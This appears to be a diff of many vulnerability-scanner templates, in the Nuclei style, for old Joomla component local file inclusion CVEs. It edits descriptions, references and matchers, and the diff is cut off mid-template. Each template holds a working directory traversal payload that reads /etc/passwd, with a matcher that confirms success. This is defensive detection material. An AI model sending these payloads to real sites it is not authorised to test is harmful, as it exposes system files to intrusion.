description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12077
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1312
|
||||
- http://secunia.com/advisories/39289
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1312
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12082
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1313
|
||||
- http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/
|
||||
- http://www.securityfocus.com/bid/39237
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1313
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Highslide 1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12086
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1314
|
||||
- http://secunia.com/advisories/39359
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1314
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component webERPcustomer - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11999
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1315
|
||||
- http://secunia.com/advisories/39209
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1315
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/33797
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1340
|
||||
- http://web.archive.org/web/20210121195000/https://www.securityfocus.com/bid/38917/
|
||||
- http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1340
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/15453
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1345
|
||||
- http://www.exploit-db.com/exploits/11785
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1345
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Juke Box 1.7 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12084
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1352
|
||||
- http://secunia.com/advisories/39357
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1352
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component LoginBox - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12068
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1353
|
||||
- http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/
|
||||
- http://www.vupen.com/english/advisories/2010/0808
|
||||
classification:
|
||||
cve-id: CVE-2010-1353
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/30
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12102
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1354
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt
|
||||
- http://secunia.com/advisories/39296
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1354
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
|
||||
reference: |
|
||||
description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12232
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1461
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://web.archive.org/web/20210518110953/https://www.securityfocus.com/bid/39504
|
||||
- http://www.securityfocus.com/bid/39504
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1461
|
||||
tags: cve,cve2010,joomla,lfi,photo
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12146
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1469
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt
|
||||
- http://www.exploit-db.com/exploits/12146
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1469
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component Web TV 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12166
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1470
|
||||
- http://secunia.com/advisories/39405
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1470
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,25 @@ info:
|
|||
name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12170
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1471
|
||||
- http://www.vupen.com/english/advisories/2010/0862
|
||||
classification:
|
||||
cve-id: CVE-2010-1471
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12167
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1472
|
||||
- http://secunia.com/advisories/39406
|
||||
- http://www.exploit-db.com/exploits/12167
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1472
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Advertising 0.25 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12171
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1473
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt
|
||||
- http://secunia.com/advisories/39410
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1473
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12182
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1474
|
||||
- http://secunia.com/advisories/39388
|
||||
classification:
|
||||
cve-id: CVE-2010-1474
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/30
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12147
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1475
|
||||
- http://secunia.com/advisories/39285
|
||||
classification:
|
||||
cve-id: CVE-2010-1475
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/24
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
|
||||
description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12150
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1476
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt
|
||||
- http://www.alphaplug.com/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1476
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,28 @@ info:
|
|||
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12145
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1478
|
||||
- http://secunia.com/advisories/39262
|
||||
- http://web.archive.org/web/20210121195422/https://www.securityfocus.com/bid/39390/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1478
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12318
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1491
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt
|
||||
- http://secunia.com/advisories/39533
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1491
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12113
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1494
|
||||
- http://www.exploit-db.com/exploits/12113
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1494
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/14
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Matamko 1.01 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
